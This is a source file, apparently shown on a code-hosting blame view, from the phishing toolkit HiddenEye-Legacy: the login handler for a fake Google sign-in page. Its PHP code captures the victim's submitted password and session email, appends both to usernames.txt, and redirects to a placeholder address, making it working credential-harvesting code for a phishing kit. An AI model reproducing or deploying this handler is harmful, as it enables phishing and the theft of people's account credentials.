HiddenEye-Legacy/WebPages/google_standard/login.php

17 lines
329 B
PHP
Raw Normal View History

2018-03-26 22:24:30 +08:00
<?php
2018-06-07 17:21:17 +08:00
include 'ip.php';
session_start();
$pass = $_POST["password"];
$email=$_SESSION["Email"];
file_put_contents("usernames.txt", "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();
session_destroy();
?>